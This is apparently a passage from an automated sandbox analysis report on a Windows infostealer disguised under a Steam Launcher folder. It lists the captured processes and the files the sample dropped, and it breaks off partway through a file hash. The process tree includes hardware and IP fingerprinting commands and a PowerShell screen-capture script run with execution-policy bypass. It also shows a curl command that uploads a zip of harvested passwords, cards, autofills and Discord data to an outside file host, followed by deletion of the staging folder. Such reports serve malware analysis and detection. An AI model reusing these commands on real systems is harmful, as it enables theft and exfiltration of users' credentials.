                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                  3⤵
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:4920
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                2⤵
                                                                                                                                                  PID:2180
                                                                                                                                                  • C:\Windows\system32\curl.exe
                                                                                                                                                    curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2444
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:3616
                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                        wmic bios get smbiosbiosversion
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4104
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2912
                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                            wmic MemoryChip get /format:list
                                                                                                                                                            3⤵
                                                                                                                                                              PID:1656
                                                                                                                                                            • C:\Windows\system32\find.exe
                                                                                                                                                              find /i "Speed"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4208
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1332
                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                  wmic path win32_VideoController get name
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Detects videocard installed
                                                                                                                                                                  PID:5060
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2236
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:3136
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:3064
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:2000
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Rijtoovx.zip";"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1144
                                                                                                                                                                      • C:\Windows\system32\curl.exe
                                                                                                                                                                        curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Rijtoovx.zip";
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4904
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:1232
                                                                                                                                                                          • C:\Windows\system32\curl.exe
                                                                                                                                                                            curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                            PID:692
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3020
                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                              wmic bios get smbiosbiosversion
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2172
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2024
                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                  wmic MemoryChip get /format:list
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:2840
                                                                                                                                                                                  • C:\Windows\system32\find.exe
                                                                                                                                                                                    find /i "Speed"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2492
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:1436
                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                        wmic path win32_VideoController get name
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Detects videocard installed
                                                                                                                                                                                        PID:3804
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4152
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:3388
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2028
                                                                                                                                                                                          • C:\Windows\system32\curl.exe
                                                                                                                                                                                            curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2368
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4432
                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                wmic bios get smbiosbiosversion
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:3636
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1464
                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                    wmic MemoryChip get /format:list
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4808
                                                                                                                                                                                                    • C:\Windows\system32\find.exe
                                                                                                                                                                                                      find /i "Speed"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5072
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4524
                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                          wmic path win32_VideoController get name
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Detects videocard installed
                                                                                                                                                                                                          PID:3044
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5004
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            PID:2152
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:3156
                                                                                                                                                                                                            • C:\Windows\system32\curl.exe
                                                                                                                                                                                                              curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4456
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:1072
                                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                  wmic bios get smbiosbiosversion
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:3764
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5044
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:1980
                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                        wmic MemoryChip get /format:list
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:692
                                                                                                                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                                                                                                                          find /i "Speed"
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:2984
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:4920
                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                              wmic path win32_VideoController get name
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Detects videocard installed
                                                                                                                                                                                                                              PID:2708
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:4116
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                PID:2180
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:4732
                                                                                                                                                                                                                                • C:\Windows\system32\curl.exe
                                                                                                                                                                                                                                  curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:4608
                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:3224
                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                      wmic bios get smbiosbiosversion
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:4912
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2556
                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                          wmic MemoryChip get /format:list
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1680
                                                                                                                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                            find /i "Speed"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:4276
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:4964
                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                wmic path win32_VideoController get name
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Detects videocard installed
                                                                                                                                                                                                                                                PID:1972
                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4860
                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  PID:1556
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:4836
                                                                                                                                                                                                                                                  • C:\Windows\system32\curl.exe
                                                                                                                                                                                                                                                    curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:668
                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:3024
                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                        wmic bios get smbiosbiosversion
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:1416
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:4896
                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                            wmic MemoryChip get /format:list
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:5004
                                                                                                                                                                                                                                                            • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                              find /i "Speed"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:2240
                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:2260
                                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                  wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Detects videocard installed
                                                                                                                                                                                                                                                                  PID:1624
                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:4972
                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                    PID:2604
                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:3860
                                                                                                                                                                                                                                                                    • C:\Windows\system32\curl.exe
                                                                                                                                                                                                                                                                      curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:2444
                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:4684
                                                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                          wmic bios get smbiosbiosversion
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:4540
                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:3444
                                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                              wmic MemoryChip get /format:list
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:928
                                                                                                                                                                                                                                                                              • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                                                find /i "Speed"
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4912
                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:4852
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                    wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Detects videocard installed
                                                                                                                                                                                                                                                                                    PID:1156
                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:2232
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                      PID:2028
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:4060
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\curl.exe
                                                                                                                                                                                                                                                                                        curl http://api.ipify.org/ --ssl-no-revoke
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:5000
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:3684
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                            wmic bios get smbiosbiosversion
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:5012
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:1012
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                wmic MemoryChip get /format:list
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:4528
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                                                                  find /i "Speed"
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:3292
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:2892
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                      wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • Detects videocard installed
                                                                                                                                                                                                                                                                                                      PID:2292
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                  PID:892

                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                • C:\ProgramData\Steam\Launcher\EN-RIJ~1\debug.log

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  72fc66b925a77dde97ffbe4cedcfd961

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  c012c0f8590ff02039d1f0e40214624f3a975b0d

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  bf86dc8c52866fb7dc831d9347d2738ca049aaf6d89044d7d1d1ce9df871e581

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  89a4ad168ad8e8e61bffa5d548e70e2590eacad51b0b32f07ade15c94fac035f8fa8bac33b1b8fc603361c9ee4680603a080d72c55e5435ef1087a6414379600

                                                                                                                                                                                                                                                                                                • C:\ProgramData\Steam\Launcher\EN-Rijtoovx.zip

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  7643f78b05fbfe0db59853596cc31a82

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  7a97dd8877894c9db706d0de6d5e512c3a704e95

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  9bb6fad8d6b7de48fe46da025fde3e9969035f037cb55b5c8d8756a1c1b1aa73

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  067cb128beac513d17e7e8b5ba191800e7179827bda98d182bb5605d838918a6aa572749a1ead020b1178f749cce1ed7df5153540f46ad1d1c56c1d8cad5a9a0

                                                                                                                                                                                                                                                                                                • C:\ProgramData\Steam\Launcher\EN-Rijtoovx\Autofills\Autofills.txt

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  94B

                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  2f308e49fe62fbc51aa7a9b987a630fe

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  1b9277da78babd9c5e248b66ba6ab16c77b97d0b

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

                                                                                                                                                                                                                                                                                                • C:\ProgramData\Steam\Launcher\EN-Rijtoovx\Cards\Cards.txt

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  70B

                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  8a0ed121ee275936bf62b33f840db290

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  898770c85b05670ab1450a96ea6fbd46e6310ef6

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

                                                                                                                                                                                                                                                                                                • C:\ProgramData\Steam\Launcher\EN-Rijtoovx\Discord\discord.txt

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  15B

                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  675951f6d9d75fd2c9c06b5ff547c6fd

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

                                                                                                                                                                                                                                                                                                • C:\ProgramData\Steam\Launcher\EN-Rijtoovx\Passwords\Passwords.txt

                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  78B

                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  c5e74f3120dbbd446a527e785dfe6d66

                                                                                                                                                                                                                                                                                                  SHA1

